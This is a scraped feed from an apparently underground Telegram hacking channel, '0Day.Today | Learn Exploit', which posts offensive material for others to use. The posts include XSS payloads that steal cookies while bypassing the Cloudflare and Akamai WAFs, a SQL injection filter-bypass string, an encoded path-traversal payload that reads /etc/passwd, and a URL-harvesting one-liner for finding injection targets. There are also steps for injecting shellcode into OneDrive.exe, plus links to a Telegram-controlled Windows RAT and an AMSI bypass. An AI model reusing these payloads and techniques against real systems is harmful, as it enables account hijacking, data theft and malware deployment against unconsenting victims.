0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
CloudFlare XSS protection WAF Bypassed 💎

<Img Src=OnXSS OnError=confirm(document.cookie)>

#WAF #XSS #Bypass #CloudFlare
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS

Github

#Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Rat for hack windows from Telegram Bot

( اینو یه کانالی میفروخت در صورتی که پابلیکش موجوده ، ری اکشناشو بترکونید 🔥)

Github

#Rat #Telegram #Windows
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Darkus is a Onion websites searcher

Github

#deepweb #darkweb 
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Linksys routers POCs

CVE-2024-33788

CVE-2024-33789

#Cve #Poc
——————‌
0Day.Today
@LearnExploit
@Tech_Army
payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Solve Google reCAPTCHA in less than 5 seconds

Github

#Tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Sql injection Manual Bypass WAF

Payload :

'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-

#sql_injection #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Time based SQL Injection using waybackurls

waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt

#sql_injection #sql #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
Zero Exploiter 🔥 Bot Exploit 💎

Share and subscribe

Made with ❤️

#Priv8 #Exploit
——————‌
0Day.Today
@LearnExploit
@A3L3_KA4
0Day.Today | Learn Exploit | Zero World | Dark web |
ZeroExploiter.py
دوستان همون طور که قبلا گفتم
این اکسپلویتر روی یه متد داره چک میکنه
و اینکه قبل از استفاده لایبراری هاشو نصب کنید
و روش قفلم نذاشتم ❤️
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK

#Bypass #Payload
——————‌
@Learnexploit
@A3l3_KA4 💎
پاول دورف گفته که تا اخر ماه میلادی جاری، قابلیتی اضافه میشه که وقتی روی هشتگی در کانال کلیک میکنید، تلگرام لیست تمام پستهایی که کانالهای پابلیک از اون هشتگ استفاده کردن رو نشون میده، چیزی مشابه هشتگ در اینستاگرام.

#news
——————‌
@Learnexploit
Forwarded from LearnExploit ️ (R00T)
کد ساخت پروفایل دلخواه برای ایفون های سری 14 و 15 هم داره تموم میشه 😄 نظرتونه ؟
RWX_MEMEORY_HUNT_AND_INJECTION_DV

💬
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling CreateRemoteThread, NtCreateRemoteThread or Direct calls.

💻 Usage:
Just compile the program and run the (EXE) without any paremeter.

💡 Steps:
⚪️ Find the OneDrive.exe in running processes.
⚪️ Get the handle of OneDrive.exe.
⚪️ Query remote process memory information.
⚪️ look for RWX memory regions.
⚪️ Write shellcode into found region of OneDrive.exe
⚪️ Fork OneDrive.exe into a new process.
⚪️ Set the forked process's start address to the cloned shellcode.
⚪️ Terminate the cloned process after execution

DEMO

😸 Github

⬇️ Download
🔒 A3l3_KA4

#ShellCode #Malware

📣 T.me/BugCod3
📣 T.me/LearnExploit
📣 T.me/A3l3_KA4
Please open Telegram to view this post
VIEW IN TELEGRAM